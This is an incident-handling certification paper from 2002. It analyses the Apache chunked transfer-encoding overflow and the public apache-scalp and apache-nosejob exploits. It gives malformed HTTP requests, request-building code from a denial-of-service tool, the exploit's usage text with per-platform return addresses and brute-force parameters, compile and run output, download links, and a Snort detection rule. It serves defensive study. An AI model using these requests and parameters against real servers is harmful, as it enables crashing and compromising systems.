Port 80: Apache HTTP Daemon
In Support of the Cyber Defense Initiative
GCIH Practical Assignment v2.1, Option 2
Submitted September
Robert N. Crooks
Conference: SANS 2002 Annual Conference
Orlando, Florida, U.S.
This document was written to provide support for the
Cyber Defense Initiative, and to obtain a certification as a GIAC Certified
Incident Handler. The included information details a remote exploit for
the most used web server software on the Internet, Apache. The reason for
choosing this specific port and exploit is due to the fact that port eighty, web
service infrastructure, is currently the most attacked port on the
Internet. In addition to that, the exploit is a "remote" exploit, which
means it can be executed without local access to the target. Finally,
because the Apache HTTP Daemon is the most popular web server on the Internet,
this exploit has a large number of possible targets.
The document is broken up into three main sections
with additional supporting sections as required for a customary technical
report. The sections are an Introduction, the port which is the target of
the exploit, and the actual exploit itself. The document is arranged so
that it can be read from start to finish with supplementary information and
resources attached at the end.
The Introduction provides a background for the entire
topic including Apache and the web infrastructure itself. This is followed
with a description of the port and protocols targeted by this exploit.
Finally, a detailed analysis of how the exploit works and the actual
vulnerability within the apache source code complete the
As of 12-September-2002, port 80 is listed as the
most attacked port on the Internet. This information was listed on the
incidents.org web page under the "Top Ten Ports". See Figure 1 for the list of
Figure 1:
Storm Center Most Attacked Ports
This port is synonymous with the World Wide Web
infrastructure and that is the main class of applications that use it. The
web depends on a service protocol called Hyper Text Transfer Protocol (HTTP),
which in turn depends on the reliable transport protocol TCP. HTTP is used
by many higher level protocols including the Common Gateway Interface
protocol. High level scripting languages can be used including Javascript,
Vbscript, and Perl with CGI to create dynamic web content. A Microsoft
attempt at "decomoditizing" the CGI protocol is called Application Server Pages
(ASP), which is another higher level application that uses
Apache is the name of what is currently an
open-source HTTP server application. The Apache web server has market
share of the Internet with 65% of all web sites on the Internet being hosted by
an Apache server1. Figure 2 is a nice graph of
the market share idea.
July 2002
August 2002
Table 1: Market Share for Web
This "market share" idea is significant when talking
about vulnerabilities or exploits because of the very large numbers of machines
that will be at risk when apache is declared vulnerable. Apache
vulnerabilities and exploits allow attackers to "harvest" great numbers of
vulnerable hosts with OS fingerprinting scans of the Internet. Internet
worms with so many hosts to infect could conceivably traverse the Internet very
quickly as the Code Red Internet worm was able to do last year. However,
this risk is mitigated by the fact that the open-source community significantly
out performs software vendors when it comes to creating and delivering a patch
to their community of users. Also, typically, system maintainers of a
Linux based web server are more familiar with the necessity of patching their
software to get the most up to date versions. Competent system
administrators routinely compile and recompile code to keep their systems fresh
and some even have CVS (Concurrent Versioning System) access to the latest
development branch of software. All these things help to quickly decrease
the number of vulnerable systems after a vulnerability is
Apache is known to be a very secure web server which
is why it is significant when a vulnerability is discovered and an exploit is
released. However, even with the latest working exploit, an attacker is at
a disadvantage when attempting to compromise an apache system. A technique
called "privilege separation" is used in software to separate applications into
two parts. A highly privileged part of the application (usually with root
privileges) executes first and handles all the tasks that require elevated
authorization (e.g. binding to a well known port number). The main part of
the program that handles the bulk of the processing is done in a very low
privileged process. Apache uses privilege separation so when an attacker
does remotely compromise an apache httpd process, they typically have a shell
with nobody, nobody, privileges (user = nobody, group = nobody). Keep in
mind that very proficient crackers will utilize other "local" exploits to raise
their privilege further.
The rest of this paper will discuss the target port in more detail, the protocols which the web server uses, and an actual exploit of the apache web server.
As stated, the target port (80) is used by web
applications. Web servers "listen" on port 80 for web requests that come
from web clients (browsers). The requests utilize the HTTP protocol
(discussed below) to obtain pages of information encoded in Hyper Text Markup
Language (HTML). The HTML pages are graphically displayed on the client
host in a web browser.
The service that was exploited for this discussion is
the web server portion of the above description.
Figure 3 shows the daily
reports graph for port 80 from www.incidents.org
The two main web server applications used on the
Internet are Apache and Microsoft's Internet Information Server. In
addition to the web server, web browsers also implement the HTTP protocol and
run on the client machine. There are many different web browsers
that use port 80 including Navigator, Mozilla, Konqueror, and Internet
Apache is a free open-source produced application
that runs on a variety of operating systems including Linux, Unix, Windows, BSD,
and OS/2. Apache source code is freely available and it is supported by a
core group of developers from the Apache Software Foundation and by many other
people throughout the Internet community. It is a full featured web server
which was designed with security in mind.
Microsoft IIS is the second most utilized web server
on the Internet. It runs on Windows NT and Windows 2000. Unlike
Apache, IIS code is closed source and only maintained by Microsoft
developers. It is definitely not free, but it is bundled with Windows NT
Server and Windows 2000 Advanced Server software.
From the Netcraft website, other HTTP servers include
iPlanet from Netscape, and Zeus from Zeus Technologies. Together, these
two servers make up a very small percentage of total web servers in use on the
In particular, this paper will not discuss these web
servers, but rather discuss the Apache web server and a recent exploit of that
Apache is an HTTP server or daemon. A daemon is
a Unix term for a process that runs in the background of a server which normally
provides continuous service to clients or performs a routine function for the
system. Another example of a daemon is the Secure Shell Daemon (sshd),
which provides clients with a secure login shell to the system. Apache
functions as a termination point for HTTP connections from client web
Apache creates a number of processes that run in the
background waiting for client connection requests. Each of the processes
are exact copies of each other and provide that ability to answer multiple
connection requests in parallel. Here is how to view apache processes on a
Linux machine:
server:~# ps -ef | grep httpd
root 12389 1 0 14:34 ? 00:00:00 /usr/local/apache/bin/httpd
nobody 12390 12389 0 14:34 ? 00:00:00 /usr/local/apache/bin/httpd
nobody 12391 12389 0 14:34 ? 00:00:00 /usr/local/apache/bin/httpd
nobody 12392 12389 0 14:34 ? 00:00:00 /usr/local/apache/bin/httpd
nobody 12393 12389 0 14:34 ? 00:00:00 /usr/local/apache/bin/httpd
nobody 12394 12389 0 14:34
? 00:00:00
As you can see, there are multiple httpd processes running in the background (not attached to any console/terminal). One process is owned by the root user, which is the main process of apache. The main process starts (or forks) multiple copies of itself to handle http requests. If any of these child processes fail and terminate, the main apache process will restart another child to replace it. Privilege separation is carried out by starting the child processes that actually handle the client connections as less privileged processes (owned by user, nobody). The main httpd process does not directly handle client connections and is less likely to encounter a software fault from client communications.
HTTP itself is a fairly simple protocol, and to date
there have only been two major versions of the standard. Version 1.0 was
completed in May 1996 and is detailed in RFC 1945. Version 1.1 was
completed as a part of RFC 2068 in January of 1997 and updated in RFC
2616. While the W3 Consortium has basically closed the development of the
HTTP protocol, work is continuing on HTTP extensions as well as the higher level
XML protocol (http://www.w3.org/2000/xp/Group ) . A standard is tentatively in the works for HTTP
extensions in the form of an experimental RFC 2774.
While HTTP may be considered simple, very complicated
protocols are derived from it (use it). Web development which started out
as the creation of static pages of HTML has now become development using
advanced programming languages (Java, Perl, Visual Basic). This was done
in an effort to supply clients with more dynamic content and interactive
sessions. Also, the HTTP protocol has gotten more complicated (read:
offered more features) with HTTP/1.1. Another protocol related to HTTP and
web development is the Common Gateway Interface (CGI). CGI is used to pass
user input supplied through a browser to server side programs written to create
dynamic content. Although the vulnerability discussed later is not related
to CGI, a whole new class of vulnerabilities were introduced when CGI programs
started appearing in web pages.
At a basic level, two hosts communicate ASCII text
back and forth in a client server model. The typical usage of HTTP
involves a client sending a request to the server (e.g. client: "send me a
document, here is it's URI") and the server responds with the information
requested (e.g. server: "here is the information, it is in
HTML). Because of this behavior, HTTP is called a request/response2
protocol. The client requests information or "pages" of ASCII text (also called
HTML pages) in the static case. In cases where more dynamic data is
requested (i.e. the data is not known at the time of web page creation), a CGI
script written the language of choice can be requested by the client. The
CGI program performs some action to obtain the data (usually by accessing a
database) and passes the result back as an HTML document.
HTTP is also referred to as a stateless
protocol3. Each request/response pair is independent and handled with no
weight placed on prior communications. That being said, with HTTP/1.1,
there are specifications in the protocol for persistent connections.
Normally, each HTML request requires a new TCP connection to be brought
up. Obviously, this can be a problem for HTTP applications that require
many requests in a short amount of time. Persistent connections help to
make these applications more efficient by conserving the number of TCP
connections created.
Of course, not only ASCII objects can be transferred
using HTTP, as was done with email (MIME), binary data can be transferred to the
client. With the use of advanced programming languages like Java, httpd
servers can execute programs to create dynamic content and even transmit
programs called applets to the clients to execute locally on their
Figure 4 shows the
relationship between all the protocols involved in a client-server web
Figure 4:
Layer Diagram for HTTP Protocols
There is really no reason why the lower layers such
as TCP and IP should be discussed in this paper. Consistent with the
fundamental reason behind layered architecture, this paper will consider the
hosts to be communicating directly with each other using
From a basic platform composed of IP, TCP, and HTTP,
and combined with an information encoding standard like HTML, more complicated
protocols were created. The Common Gateway Interface (CGI) was created to
standardize a method where user input could be passed to a server side program
through HTTP requests (URI requests). By allowing user feedback, web
sessions can be made more interactive. Scripting languages like Java,
Perl, and Visual Basic can be used to accept user input and run programs on the
server host to process user requests and format dynamic
Needless to say, with the addition of more
complicated protocols and server programs, security becomes harder to enforce
and vulnerabilities are more numerous. For example, with CGI scripts
running on the server accepting user input, a whole class of buffer overflow
vulnerabilities was created. With CGI programs residing on web servers,
the attacker no longer had to find weaknesses in the web server or OS software
only, but could simply attack a poorly designed CGI script. A small
vulnerability in an example CGI script provided in a default Httpd installation
can spawn Internet Worms that scan for such scripts, exploit the host, and
install malicious software (root kits).
Other protocols related to HTTP include, but are not
limited to, SSL, XML, ASP, and CSS. Secure Socket Layer (SSL) is a
protocol which provided very necessary components to HTTP connections,
confidentiality and server authentication. SSL provides a layer of
software to encrypt all data passing through a TCP connection and digital
certificates are used to authenticate web servers. The Extensible Markup
Language (XML) is an information encoding scheme that will act as a successor to
HTML. A definition of Application Server Pages (ASP) from http://www.wineries.goldstate.net/asp_definition.htm is as follows:
Active Server Pages, a specification that generates dynamically created web Pages. These server side dynamic pages allow user interaction and database connectivity, providing for a wealth of web Application functionality, such as shopping carts, Newsgroups and Discussion Forums. All of the specialized applications shown on this Coastal web example site are created with ASP pages.
Note to the reader: ASP is Microsoft's attempt
to re-create or de-commoditize4 the CGI standard.
Cascading Style Sheets (CSS) is a part of the HTML standard. CSS allow web developers to standardize the way their HTML pages will be displayed by applying a generic style to web pages.
As stated, with more complicated protocols and
standards, more functionality is available to create dynamic, interactive web
sessions at the cost of security.
CGI script vulnerabilities are a direct consequence
of allowing user input to be supplied to server side programs. Any
application that accepts user input is immediately at risk of a buffer overflow
software fault. Any user input must be placed in a buffer and without
proper software design, buffers can be overflowed. Software buffers are
not implicitly protected data structures, but rather need to be "taken care of"
by the software developer. While this is changing with more modern
compilers and debuggers, quite often, a buffer is simply a fixed amount of space
with a mere pointer for access. CGI scripts execute in a process on the
web server and a successful buffer overflow (BOF) exploit will give the attacker
a local shell on the machine. All the BOF attack methods described below
apply to CGI programs.
Cross site scripting (XSS) is a class of
vulnerability that exploits a feature in HTML that allows a script to be
embedded in a URL link. A malicious user can use XSS to get unauthorized
information from a client host or user. XSS is done by providing a user
with a URL that includes malicious software embedded in it. When the user
clicks on the URL, the Javascript, Vbscript, or ActiveX embedded content is run
on the client system. A very simplistic example of an XSS attack would be
to embed a javascript applet in a URL. If the program simply displays a
nice looking frame with a password dialog asking for the user's POP3 account
name and password, account information could be gathered. Web forums,
instant messengers, and email can be used to send the malicious URL strings to
the user.
Database manipulation is a problem affecting web
servers that act as a front end to database systems. HTTP servers that
hand user requests to a database can be subject to a database manipulation
attack if user input is not parsed and validated carefully. User input is
fed with malformed database string specifically designed to extract more
information than is intended, or potentially run arbitrary code. An
example of this attack would be to add elements of SQL syntax at the end of a
user input field. If the server is vulnerable, the user input and
potentially the piggybacked SQL command could be fed to the database back-end
URL directory traversal is a very simple attack where
the ".." (previous directory) symbol is included in a URL request. Using
this malformed URL string, it can be possible to jump out of a document root
directory structure and into the web server's file system. An attacker can
sometimes gain complete access to the file system on the web server and with
some versions of MS IIS, it can even provide a mechanism to run arbitrary
The other major class of vulnerabilities have to do
with implementation errors in the software running to provide HTTP access.
Implementation of the web server or browser can lead to exploits that allow a
remote attacker to compromise a host. The implementation of the web server
can sometimes contain errors such as buffers whose bounds are not checked
(buffer overflow attacks), printf statements with no format string (format
string attacks), improper use of malloc and free statements (heap
corruption). For a very complete explanation of buffer overflow
techniques, see "Smashing the Stack for Fun and Profit", in Phrack article #49:
http://www.phrack.com/show.php?p=49&a=14. For a good explanation of format string exploitation see
http://www.phrack.com/show.php?p=59&a=7. This report details an error in the implementation of
the apache web server. Specifically, the error is in the way apache
handles chunked transfer encoding.
Additionally, the HTML browser implementation may contain errors of the sort described above. Recent vulnerabilities have been found in web browsers that allow attackers to run arbitrary code on the client host.
The name of the exploit that will be described in
this document is apache-scalp.c. In addition to apache-scalp.c, another
variant of this exploit (apache-nosejob.c) will be
discussed because it is simply a newer version of apache-scalp.c. This
document will use these two program names synonymously to refer to the same
This exploit has had a lot of news coverage lately
(http://www.linuxsecurity.com/feature_stories/feature_story-113.html) mainly because people have made statements that the
vulnerability in apache affects "63% of the web pages on the Internet" and
"millions of web servers are vulnerable". It was even stated in one online
news article that "the Internet may come grinding to a halt" with the release of
exploit code for the vulnerability. These statements are a result of the
incorrect assumption that the exploit code affects all apache web servers, which
at this point is incorrect. Only a small percentage of the total apache
web servers, BSD systems (FreeBSD, OpenBSD, and NetBSD) in particular, are
affected by the exploit code. The fact that exploit code has not been
released for Linux effectively eliminates the script-kiddie activity for that OS
and limits the scope of worms to only the BSD portion of the apache web server
This vulnerability can be linked to by the following databases:
- Common Vulnerabilities and Exposure (CVE) CAN-2002-0392
- CERT VU#944335
- CERT CA-2002-17
A few variants of this exploit have been found and are available from public sources:
- apache-nosejob.c: This is the second version of the apache exploit expanded on the first with support for a wider range of targets. Specifically, NetBSD and FreeBSD distributions can be exploited with this code. The code can be found at the following URL:
- GeneralCuster.exe: This presumably is the
windows port of the exploit code, which was mentioned in the exploit source
code. While this file has not been found in the wild yet, it may not
have been released yet or released under another file name.
- apache-nosejob.zip:
This is a cygwin port of apache-nosejob.c; available
at http://packetstorm.decepticons.org/0206-exploits/apache-nosejob.zip.
- apache-smash.sh.gz: A remote DOS for apache;
available at http://packetstorm.decepticons.org/0206-exploits/apache-smash.sh.gz.
- apachefun.tar.gz: Another DOS attack tool
that causes a segmentation fault in the httpd process that accepts the
connection. It is available at http://packetstorm.decepticons.org/0206-exploits/apachefun.tar.gz.
Also, along with these exploits, there may be an
apache-scalp-HOWTO.pdf document coming out,
which will presumably document exactly how to implement this exploit and
possibly document more fully how to attack other Linux based
This exploit specifically works well with NetBSD,
OpenBSD, and FreeBSD operating systems. Testing of the "brute force"
functionality of the exploit tool did not successfully extend the range of OSes
affected by the code to Linux. However, theoretically, virtually all OSes
that can run apache are vulnerable to this exploit since the vulnerability is in
the apache software itself. This is further supported by the fact that the
brute force option may in fact be useful for someone very knowledgeable with
apache running on other platforms. That is, this exploit could be ported
to any operating system by a person who knows a lot about the OS and apache and
the brute force option makes this easier to accomplish. That being said,
there is a peculiarity (read: bug) in the BSD implementation of memcpy that
contributes to the ability to execute arbitrary code. While other
platforms may be vulnerable to the apache vulnerability, they may not be
vulnerable to the running of arbitrary code. This is described later in
the document.
This exploit uses a simple TCP/IP connection to a
vulnerable server and uses a malformed, and chunked, HTTP request to trigger the
vulnerability. By crafting the HTTP request with a precisely formatted
buffer and malicious code, a stack overflow is created and the malicious code is
This exploit uses the vulnerability in the way that
apache handles bad requests encoded with chunked encoding. So, to exploit
the vulnerability, the attack tool uses a C program to connect to port 80 of the
target web server via TCP and send a bad request to the web server. An
example of the bad request is as follows:
POST /x.html HTTP/1.1
Host: 192.168.x.x
Rapid 7
The request tells the web server that it has been
sent in chunks and the server process answering the malformed request will try
to allocate the buffers necessary to handle subsequent chunks. The above
relatively simple request will overflow the stack in the httpd process that
handles the request. This happens because a negative number passed to the
memcpy command causes very bad things to happen. Basically, the function
which calls memcpy doesn't adequately validate the input coming from the http
stream. In 2.0 versions, the error is detected and the httpd server
process handling the request is restarted. This is still bad because it
gives an attacker the ability to restart processes on the server very quickly
and thus reduce availability (read: Denial of Service).
If the request carefully crafted, the buffer will overflow the stack and in particular, the return pointer allowing arbitrary code to be executed. At the very least, the server process will encounter a segmentation fault, caused by the overflow writing over invalid memory, and terminate. This means a DoS attack is easily created and the remote exploit may achieved with some effort.
The exploit was first released under the file name
"apache-scalp.c" and its second version was renamed "apache-nosejob.c".
The apache-nosejob.zip file
contains a port of the code to the cygwin tool for windows. This allows
the attacker to run the exploit from a windows based host with cygwin
installed. See the detailed discussion of apache-nosejob.c for this
The existence of the "GeneralCuster.exe" tool is not
know because the only reference found on the Internet was in the apache-nosejob.c source
* --- we wonder how much they'll like
Upon speculation, GeneralCuster.exe is most likely a
full port of the attack code to the win32 platform.
The apachefun.tar.gz archive contains a C program
called generic_chunked.c, which is a very poorly coded program to implement a
DOS tool. It is simply a C program that connects to a web server and sends
a variant of the malformed request quoted above. It could probably be
replaced by a 10 line Perl script. However, it was not tested so its
effectiveness cannot be verified. From the following code quoted from the
source, one can see that it is a variant of the test HTTP request posted by Joe
s_string("POST /");
s_string(" HTTP/1.1\r\n");
s_string("Host: ");
s_string("User-Agent: ");
s_string("Galeon/1.0.3 (X11; Linux i686; U;) Gecko/0\r\n");
s_string("Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,video/x-mng,image/png,image/jpeg,image/gif;q=0.2,text/css,*/*;q=0.1\r\n");
s_string("Accept-Language: en\r\n");
s_string("Accept-Encoding: gzip, deflate, compress;q=0.9\r\n");
s_string("Accept-Charset: ISO-8859-1, utf-8;q=0.66, *;q=0.66\r\n");
s_string("Keep-Alive: 300\r\n");
s_string("Connection: keep-alive\r\n");
s_string("Content-type: application/x-www-form-urlencoded\r\n");
s_string("Transfer-Encoding: chunked\r\n");
//s_string("Content-Length: 0\r\n");
The apache-smash tool is a portable DOS tool (bourne
shell - sh) script for apache version 1.3.24. It too implements a variant
of the invalid HTTP POST request with the improper chunked request
All of these exploits work as a result of the same
chunked transfer encoding vulnerability so they are all very similar.
However, they can be broken down into two groups. One group is code that
is based on the original exploit released by GOBBLES Security.
Apache-scalp.c is the original exploit, apache-nosejob.c is the
second version of that exploit. Apache-nosejob.zip is a
windows port of the original code and the mystery tool, GeneralCuster.exe
probably is the same.
The other group of tools includes the
generic_chunked.c program and the apache-smash.sh script. These two are
basically small programs that inject variants of the test script posted on
Usenet by "Joe Testa"5. They both function by passing a malicious request
repeatedly to a target http daemon to disable it. Having no httpd
processes servicing connections (because they are restarting) means no web pages
are displayed.
Follow the links above to each of these exploits for more information about them.
This section will go more in depth about the protocol
used by the exploit to attack the vulnerable apache software. That
protocol is HTTP and in particular, a single feature of the HTTP protocol called
chunked transfer encoding.
The HTTP protocol allows HTTP requests and responses
to be sent in segments or chunks. That is a single request/response is
broken up into pieces and sent separately. This allows for dynamically
created content to be delivered in chunks when the final size is not known in
advance. It also allows the httpd server to allocate memory more
efficiently for browser requests. RFC 2616 has a section on transfer
codings and more specifically, chunked transfer coding (http://www.w3.org/Protocols/rfc2616/rfc2616-sec3.html ).
Here is an example of an HTTP post request being sent
"chunked" to a server:
HTTP/1.1 200 OK
Content-Type: text/plain
a-footer: a-value
The first portion is the HTTP header information
which indicates that chunked transfer coding is being used. Following that
information, each chunk is sent preceded by a hex number indicating the size of
the chunk in bytes. After the size indicator, the data of the chunk is
transmitted. The size of the data before the next CRLF should be equal in
bytes to the size indicator directly before the data. Following the CRLF,
the next chunk is transmitted with another chunk size indicator and subsequent
data. This chunking continues until all the data has been sent and the
last chunk has a "0" in the size field. This terminates the chain of
In the example HTTP transaction, the first chunk is 0x10 (16 bytes) in length, which can be verified by looking at the data (after the CRLF). The data contains exactly 10 ASCII characters followed by a CRLF. The next chunk contains 16 ASCII bytes (0x10 bytes) followed by a CRLF. The end of the chunked data is indicated by the "0" for the last chunk size.
If the example HTTP post request posted by "Joe
Testa" is analyzed with this new information, it can be seen that the first
chunk sent has a size of 0x80000000 bytes. This seems to indicate that the
chunk is saying that its size is over 2 GB! However, if you put that
hexadecimal number into a signed integer field, the most significant bit will be
used as a sign. The above number will convert (2's complement to)
-FFFFFFFh. This exploit works because in the HTTP protocol for chunking,
the length field is extracted from the HTTP stream and placed in a signed
integer variable. The comparison below is used to limit the binary read
(ap_bread) to reading no more than the buffer will hold. However, if the
data remaining is less than the size of the buffer (i.e. only read the remainder
bytes), the figure in the remaining variable is used in the ap_bread() function
call. A negative number will be passed into the ap_bread function and down
to memcpy(), which will interpret it as a very large number (not negative
anymore). The problem is that the logic below assumes an unsigned
comparison, which isn't the case.
/* Otherwise, we are in the midst of
reading a chunk of data */
len_to_read = (r->remaining > bufsiz)
? bufsiz : r->remaining;
len_read = ap_bread(r->connection->client, buffer, len_to_read);
if (len_read <= 0) {
r->connection->keepalive = -1;
return -1;
Testing this vulnerability was done with gdb.
Using command line options, the httpd server was started in single threaded mode
(i.e. the main httpd process handled all http requests and did not fork multiple
child processes). Also, to accomplish this, apache was recompiled with the
debug option (for gcc, '-g' in the compiler options leaves debug information in
the object files). Using gdb with the httpd process, the buffer overflow
was examined in detail. For information sake, the command to compile the
apache source with debugging symbols is as follows:
CFLAGS="-g" ./configure --without-execstrip
The code that is triggered by this request is in
http_protocol.c in the apache source code distribution. To investigate
this error, an httpd process was attached to with gdb and the fault was analyzed
using breakpoints and through the stack trace back. At first it was not
clear where in the source the fault was happening because when execution
terminates with a segmentation fault, the stack is overwritten and the history
is lost (i.e. gdb can't interpret the stack to get backtrace information).
However, the traceback did show the last function called, memcpy. To get
past this problem, a breakpoint was set on the memcpy function and each time the
breakpoint stopped execution before memcpy, a backtrace (bt) was called to see
the full stack frame (before the corruption). By continuing execution
until the segmentation fault occurred, the last stack frame could be seen in the
gdb scroll-back buffer.
The reason that the memcpy triggers a segmentation
fault is the byte copy extends beyond the end of the destination buffer and into
areas of memory that are write protected for that process. The size input
from the stream is not represented in an unsigned integer, and the comparison
meant to protect the call to memcpy logically does not work. When memcpy
tries to copy the very large amount of bytes into the buffer, it goes beyond the
8192 size boundary and writes into protected memory.
The apache-scalp.c exploit works by sending an HTTP
request that utilized this chunked transfer encoding. However, the HTTP
transaction looks something like the HTTP stream in Appendix A. As can be
seen by the last line, the chunk size indicator is 0xffffff6a, which will be
interpreted as -150 in the program execution. The signed comparison
(above) will allow the -150 read size to pass into the memcpy function where it
will interpreted as 4294967146 and proceed to overwrite the
Breakpoint 11, ap_get_client_block (r=0x80f222c,
buffer=0xbfffd802 "\023@H\016\030@", bufsiz=8180) at http_protocol.c:2174
2174 len_to_read = (r->remaining > bufsiz) ? bufsiz : r->remaining;
15: bufsiz = 8180
14: len_to_read = -150
(gdb) printf "%x\n",len_to_read
While at this point, the exploit can be used as a DOS
tool, it can also be converted with careful work and testing to be a remote
exploit. By crafting the information in the request and aligning it
properly, the stack can be overwritten in such a way as to overwrite a return
address and the length parameter passed into memcpy. This will complete
the exploit by allowing the memcpy to end without triggering a segmentation
fault and thereby trigger the crafted return address. This was explained
quite well on Usenet6:
> In Apache we trigger exactly this piece of code: bsd thinks the two
> buffers are overlapping and so it wants to copy backward.
> The problem is that you are able to overwrite the call to memcpy
> including the supplied paramters (dst, src, length). With up to
> 3 bytes ([1]) depending on alignment. if you align everything perfectly
> you can set the 3 high bytes of length to zero and so change how many
> dwords memcpy tries to copy in our case 0x000000??
> This is only possible because the code reads the length param again from
> stack [X]... This way you can easily survive the call and overwrite
> the saved instruction pointer before
the memcpy call...
I should just point out the slight error in this analysis - in fact, the
exploit only overwrites two bytes of the length (incidentally, the
length is also constrained to be its own stack offset, leaving no room
for manouver at all) - so the length is initially -146 (ffffff6e), and
after overwriting becomes 0000ff6e, copying just under 64k onto the
stack, which is plenty for a standard
stack-based shellcode exploit.
One can speculate that it is for this reason that the
following comment is made in the source code:
* Remote OpenBSD/Apache exploit for the "chunking" vulnerability. Kudos to
* the OpenBSD developers (Theo, DugSong, jnathan, *@#!w00w00, ...) and
* their crappy memcpy implementation that makes this 32-bit impossibility
* very easy to accomplish. This vulnerability was recently rediscovered by a slew
* of researchers.
Another explanation is longer and is included in Appendix D - Explanation of Apache Vulnerability by Ben on Usenet.
The following test setup was used to experiment with
the exploit and learn how it worked.
Figure 5: Network layout
Alternatively, the exploit can be run on the same host as the web server software. This was also done to reduce the need to switch between two host environments. Additionally, gdb was also run on the web server host to monitor the httpd software while the malicious request was being processed.
The apache-scalp.c and apache-nosejob.c programs
are C programs and turn out to be very easy to compile, it was possible to
compile the programs quite easily with the following
$> gcc -o apache-nosejob apache-nosejob.c
As could be seen from the windows and cygwin ports of
the exploit code, it is very easy to port to any compiler friendly
platform. However, the remote exploit itself is not very portable in that
it uses a platform specific shellcode that limits it to Unix operating
systems. This does not refer to the DOS exploits because they don't
contain any platform specific commands because they go no farther than sending
an HTTP request. The remote shell exploit goes further on BSD systems by
executing a shellcode as the arbitrary code.
The exploit itself was compiled using gcc on Linux
and FreeBSD platforms for testing. In each case, the previous gcc compiler
command was all that was needed to compile the executable.
The source code lists the following as susceptible to the exploit:
> OpenBSD
> FreeBSD
> NetBSD
> Linux
Testing using the brute force option in the exploit
program did not successfully compromise the Linux platform, but this could be
explained by a Bugtraq post by "Ben"7. In order to complete the compromise
and execute arbitrary code, the memcpy() function call mustn't trigger a
segmentation fault. It is the additional bug in the memcpy()
implementation on BSD that allows this to be done with the proper
I've also checked, and FreeBSD is indeed vulnerable in the same way, but the glibc implementation I have seen of memcpy is not, so if Linux is vulnerable, its by another route. I haven't looked at Solaris.
http://www.apache-ssl.org/ben.html http://www.thebunker.net/
- the source of the exploit also specifies the following vulnerable versions of apache (it is fixed in apache v1.3.26 and apache v2.0.39)
> apache v1.3.24 and below
> apache
v2.0.36 and below
The exploit has a very nice usage()
GOBBLES Security
Labs - apache-nosejob.c
Usage: ./apache-nosejob <-switches> -h host[:80]
-h host[:port] Host to penetrate
-t # Target id.
Bruteforcing options (all required, unless -o is used!):
-o char Default values for the following OSes
(f)reebsd, (o)penbsd, (n)etbsd
-b 0x12345678 Base address used for bruteforce
Try 0x80000/obsd, 0x80a0000/fbsd, 0x080e0000/nbsd.
-d -nnn memcpy() delta between s1 and addr to overwrite
Try -146/obsd, -150/fbsd, -90/nbsd.
-z # Numbers of time to repeat \0 in the buffer
Try 36 for openbsd/freebsd and 42 for netbsd
-r # Number of times to repeat retadd in the buffer
Try 6 for openbsd/freebsd and 5 for netbsd
Optional stuff:
-w # Maximum number of seconds to wait for shellcode reply
-c cmdz Commands to execute when our shellcode replies
Examples will be published in upcoming
--- --- - Potential targets list - --- ---- ------- ------------
ID / Return addr / Target specification
0 / 0x080f3a00 / FreeBSD 4.5 x86 / Apache/1.3.23 (Unix)
1 / 0x080a7975 / FreeBSD 4.5 x86 / Apache/1.3.23 (Unix)
2 / 0x000cfa00 / OpenBSD 3.0 x86 / Apache 1.3.20
3 / 0x0008f0aa / OpenBSD 3.0 x86 / Apache 1.3.22
4 / 0x00090600 / OpenBSD 3.0 x86 / Apache 1.3.24
5 / 0x00098a00 / OpenBSD 3.0 x86 / Apache 1.3.24 #2
6 / 0x0008f2a6 / OpenBSD 3.1 x86 / Apache 1.3.20
7 / 0x00090600 / OpenBSD 3.1 x86 / Apache 1.3.23
8 / 0x0009011a / OpenBSD 3.1 x86 / Apache 1.3.24
9 / 0x000932ae / OpenBSD 3.1 x86 / Apache 1.3.24 #2
10 / 0x001d7a00 / OpenBSD 3.1 x86 / Apache 1.3.24 PHP 4.2.1
11 / 0x080eda00 / NetBSD 1.5.2 x86 / Apache 1.3.12 (Unix)
12 / 0x080efa00 / NetBSD 1.5.2 x86 / Apache 1.3.20 (Unix)
13 / 0x080efa00 / NetBSD 1.5.2 x86 / Apache 1.3.22 (Unix)
14 / 0x080efa00 / NetBSD 1.5.2 x86 / Apache 1.3.23 (Unix)
15 / 0x080efa00 / NetBSD 1.5.2 x86 /
Apache 1.3.24 (Unix)
There are two main modes of operation. The
target specific mode accepts a target number and runs the exploit with a set of
parameters that were proven to work, by the exploit author, through
testing. As can be seen from the above usage() function, there are 15
targets which theoretically work for various versions of apache running on all
types of BSD Unix OSes. The other mode of operation is the "brute force"
method, which attempts to run the exploit repeatedly it gets an expected
response (a shell is returned). The following two screenshots show two
unsuccessful attacks using the exploit in both modes.
server:~# ./apache-nosejob -t 1 -h localhost
[*] Resolving target host..
[*] Connecting.. connected!
[*] Exploit output is 32322 bytes
[*] Currently using retaddr 0x80a7975
Ooops.. hehehe!
The above exploit execution simply connects to the
target system, creates the malicious http request, and sends it to the
target. Since the exploit was not run with the brute force options, the
execution stops after just one try.
server:~# ./apache-nosejob -o f -h localhost
[*] Resolving target host..
[*] Connecting.. connected!
[*] Exploit output is 32322 bytes
[*] Currently using retaddr 0x80a0000
[*] Currently using retaddr 0x80a8a00
[*] Currently using retaddr 0x80b1400
[*] Currently using retaddr 0x80b9e00
[*] Currently using retaddr 0x80c2800
The above execution shows the brute force exploit working. This attack is just a bunch of the previous attacks repeated with different return addresses. The "PppP" string is printed out while the exploit is running and I think it is meant to emulate a person who is working at something and sticks their tongue out with exertion.
Appendix A shows the HTTP stream of the malformed
request as created by the exploit. It was created with Ethereal using the
"Follow TCP stream" tool. By looking at the malicious HTTP stream, you
could easily find a rule and manually put it in your IDS program, but this is
not necessary.
The following snort IDS rules were found on the snort
web site. Since this exploit is a few months old, the major IDS vendors
have already released the rules necessary to detect the attack. However,
the people who were competent and determined enough to write this exploit would
be very capable of encoding the buffer in such a way as to render these rules
obsolete. This technique is called "mutating" or "morphing" the
alert tcp $EXTERNAL_NET any ->
(msg:"CUSTOM - Apache Chunking exploit"; \
content:"Transfer-Encoding\: chunked|0d0a0d0a|fffffff0|0d0a"; nocase;
reference:cve,CAN-2002-0392; \
This is just one of many snort signatures that could
be helpful in detecting this exploit. Appendix C has a larger list of
possible rules.
The following are pieces of the apache log file
(error_log) that show the evidence of the brute force attack working on your web
[Wed Sep 11 09:27:19 2002] [notice] child pid 8093 exit signal Segmentation fault (11)
[Wed Sep 11 09:27:19 2002] [notice] child pid 8092 exit signal Segmentation fault (11)
[Wed Sep 11 09:27:19 2002] [notice] child pid 8090 exit signal Segmentation fault (11)
[Wed Sep 11 09:27:19 2002] [notice] child pid 8089 exit signal Segmentation fault (11)
